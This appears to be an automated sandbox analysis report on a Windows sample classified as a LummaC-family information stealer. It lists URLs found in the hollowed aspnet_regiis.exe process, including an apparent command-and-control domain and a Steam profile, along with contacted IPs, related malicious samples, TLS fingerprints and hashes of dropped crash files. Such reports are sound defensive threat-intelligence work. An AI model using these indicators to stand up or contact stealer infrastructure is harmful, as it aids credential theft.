https://help.steampowered.com/en/	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/market/	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/news/	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://store.steampowered.com/subscriber_agreement/	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	aspnet_regiis.exe, 00000002.00000003.1866541610.000000000503C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866624782.0000000005035000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/discussions/	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/stats/	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/apidows6$	aspnet_regiis.exe, 00000002.00000002.2310023537.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/steam_refunds/	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	aspnet_regiis.exe, 00000002.00000003.1866624782.0000000005010000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=kOc26QwM0vlX&l=e	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/workshop/	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	aspnet_regiis.exe, 00000002.00000003.1967836712.000000000510B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/legal/	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com:443/profiles/76561199724331900d	aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/9	aspnet_regiis.exe, 00000002.00000002.2310585702.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	aspnet_regiis.exe, 00000002.00000003.1968573576.0000000002C3D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/apiH	aspnet_regiis.exe, 00000002.00000003.2034108887.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2049691966.0000000002BBD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.8.dr	false		high
https://store.steampowered.com/	aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.157.254	lev-tolstoi.com	United States		13335	CLOUDFLARENETUS	false
23.55.153.106	steamcommunity.com	United States		20940	AKAMAI-ASN1EU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1577513
Start date and time:	2024-12-18 14:45:42 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Armanivenntii_crypted_EASY.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/7@11/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 83% Number of executed functions: 41 Number of non-executed functions: 53
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29, 172.202.163.200, 20.190.177.82, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Armanivenntii_crypted_EASY.exe

Simulations

Behavior and APIs

Time	Type	Description
08:46:36	API Interceptor	13x Sleep call for process: aspnet_regiis.exe modified
08:47:37	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
172.67.157.254	aqbjn3fl.exe	Get hash	malicious	LummaC	Browse
	aqbjn3fl.exe	Get hash	malicious	LummaC	Browse
	v_dolg.exe	Get hash	malicious	LummaC Stealer	Browse
	random.exe.6.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar	Browse
	alexshlu.exe	Get hash	malicious	LummaC Stealer	Browse
	ardware-v1.exe	Get hash	malicious	LummaC	Browse
	https://t.co/nq9BYOxCg9	Get hash	malicious	HTMLPhisher	Browse
23.55.153.106	aqbjn3fl.exe	Get hash	malicious	LummaC	Browse
	aqbjn3fl.exe	Get hash	malicious	LummaC	Browse
	zq6a1iqg.exe	Get hash	malicious	LummaC Stealer	Browse
	v_dolg.exe	Get hash	malicious	LummaC Stealer	Browse
	cccc2.exe	Get hash	malicious	LummaC	Browse
	CompleteStudio.exe	Get hash	malicious	LummaC	Browse
	random.exe.6.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar	Browse
	alexshlu.exe	Get hash	malicious	LummaC Stealer	Browse
	99awhy8l.exe	Get hash	malicious	LummaC	Browse
	5_6253708004881862888.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
lev-tolstoi.com	aqbjn3fl.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	aqbjn3fl.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	v_dolg.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.157.254
	CompleteStudio.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	random.exe.6.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar	Browse	172.67.157.254
	alexshlu.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.157.254
	5_6253708004881862888.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	1fxm3u0d.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	2kudv4ea.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	ardware-v1.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
steamcommunity.com	aqbjn3fl.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	aqbjn3fl.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	zq6a1iqg.exe	Get hash	malicious	LummaC Stealer	Browse	23.55.153.106
	v_dolg.exe	Get hash	malicious	LummaC Stealer	Browse	23.55.153.106
	cccc2.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	CompleteStudio.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	random.exe.6.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar	Browse	23.55.153.106
	alexshlu.exe	Get hash	malicious	LummaC Stealer	Browse	23.55.153.106
	99awhy8l.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	5_6253708004881862888.exe	Get hash	malicious	LummaC	Browse	23.55.153.106

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASN1EU	aqbjn3fl.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	aqbjn3fl.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	http://www.mynylgbs.com	Get hash	malicious	Unknown	Browse	23.195.38.175
	loligang.ppc.elf	Get hash	malicious	Mirai	Browse	96.17.102.118
	zq6a1iqg.exe	Get hash	malicious	LummaC Stealer	Browse	23.55.153.106
	v_dolg.exe	Get hash	malicious	LummaC Stealer	Browse	23.55.153.106
	cccc2.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	CompleteStudio.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	random.exe.6.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar	Browse	23.55.153.106
	alexshlu.exe	Get hash	malicious	LummaC Stealer	Browse	23.55.153.106
CLOUDFLARENETUS	random.exe.2.exe	Get hash	malicious	LummaC	Browse	104.21.64.80
	aqbjn3fl.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	aqbjn3fl.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	https://pluginvest.freshdesk.com/en/support/solutions/articles/157000010678-pluginvest-laadoplossing	Get hash	malicious	Unknown	Browse	162.159.140.147
	goldlummaa.exe	Get hash	malicious	LummaC	Browse	104.21.50.161
	hnsjdghf18.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	ko.ps1.2.ps1	Get hash	malicious	Unknown	Browse	172.64.41.3
	kjshdgacg18.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	104.21.23.76
	InstallSetup.exe	Get hash	malicious	LummaC	Browse	172.67.220.223

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	random.exe.2.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	aqbjn3fl.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	aqbjn3fl.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	goldlummaa.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	172.67.157.254 23.55.153.106
	InstallSetup.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	ScreenUpdateSync.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	random.exe.10.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	zq6a1iqg.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.157.254 23.55.153.106
	v_dolg.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.157.254 23.55.153.106

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_aspnet_regiis.ex_50bfb89f751f3bc9a670ed08f716b2c28e2c7d0_b69738a1_50a4b111-a5d1-48c1-9ba0-ddf6cd44aa0c\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.018995465917928
Encrypted:	false
SSDEEP:	192:OqhP1vocjWj/0BU/4jo05xzuiF1Z24IO8C:T7AcjWjsBU/4jZzuiF1Y4IO8C
MD5:	2C6CE64CFC62712CFBBCFA9E6CE76FCB
SHA1:	5742467786EAD210E61A1A782C5BE549496A3B9F
SHA-256:	0B92B08349CD1394B184FDFC6B36F95EB1D8CED806E6BFEF93696B80D46F4525
SHA-512:	81B6DAF33428CCAF27A015AD8CB16B44608D3E9A8FCD13F433E065ADDD6895398D685726A147536D40740F54652F9A002D19AEC451FF00B99BBA6C2CA24A9E19
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.0.3.2.3.6.2.0.0.5.2.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.0.3.2.3.6.9.1.9.2.6.4.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.0.a.4.b.1.1.1.-.a.5.d.1.-.4.8.c.1.-.9.b.a.0.-.d.d.f.6.c.d.4.4.a.a.0.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.b.3.1.4.7.e.7.-.b.9.c.4.-.4.f.1.4.-.a.b.6.2.-.c.9.f.e.5.2.2.5.0.5.3.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.a.s.p.n.e.t._.r.e.g.i.i.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.a.s.p.n.e.t._.r.e.g.i.i.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.f.0.-.0.0.0.1.-.0.0.1.4.-.b.9.f.5.-.4.d.4.1.5.3.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.c.5.5.8.f.0.e.8.4.2.c.4.3.e.6.b.3.b.c.0.6.6.9.1.6.b.2.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER272D.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Dec 18 13:47:16 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	108930
Entropy (8bit):	2.0059889879875312
Encrypted:	false
SSDEEP:	384:jEAgn6yhIStG4s3Suwcp3msOzv0QBTv25uQuOT5dyuD:IXbtG4siuwyKBTmuOy+
MD5:	1FB7E1E2E54F13AF27F6731976873501
SHA1:	0E1C93648356054565F4190ABB3546A21DD1AC1E
SHA-256:	4461B45852ED5ED89249A7C732A4CE39E4F4A0F39C68D09FB6DF03A2D7A1040A
SHA-512:	35C2FB26DCEEDDA12874652777E59F66C5BE2032518BCF8823E172D55E45E4B4CA9FAD14FF1BA13FEE3E2470742AB3983FEE08F675B27B1464C972CF474F1FB4
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......d.bg........................\|...............D!...........J..........`.......8...........T............>...j..........X"..........D$..............................................................................eJ.......$......GenuineIntel............T...........;.bg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2876.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8324
Entropy (8bit):	3.6894486037401375
Encrypted:	false
SSDEEP:	192:R6l7wVeJjN6jyw6YSX6QTgmfCklxpr089b6ksfZem:R6lXJp6mw6Ya60gmfCklt6XfZ
MD5:	AA3EBA585F230F52176FFA7F65057C40
SHA1:	563C0E347C4B0186764DFEB46518811726C0F925
SHA-256:	10E38243BC939E689A79F366DC5342D3161DFD7FD6460F296E73094ED22CB57E
SHA-512:	847108D7EEDCF07A025CD68E0B48A640CABE9791E95EF6A1953FD38DC24B9C20DA3FB38715EF8B91166C46605DE248511C1686DB70EFDC7B109419D433FED552
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.0.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2897.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4683
Entropy (8bit):	4.4603757606159204
Encrypted:	false
SSDEEP:	48:cvIwWl8zsHJg77aI9QkUUSWpW8VYMYm8M4JhiffEgF58J+q8bitGQR1SaraDwMsy:uIjfpI7ykUa7VwJh6GgCpSaraLsMd
MD5:	CD5F85879F79003ED60B1C76733B711F
SHA1:	9DD66EFF418BE5EF7E9B52CEE2E883BD24A64B7F
SHA-256:	8AE1F6052167AEC019480BD58265022752F742EE8504031266A61EBF18A330CE
SHA-512:	83C5CE038C026369A9FB52825FB4EEA335C910B12F70C085BD2A9A14DC6317235EB618BACD221602344A57256A4023B2E794271D6BF200C225C6919CCA28BB76
Malicious:	false
Reputation:	low
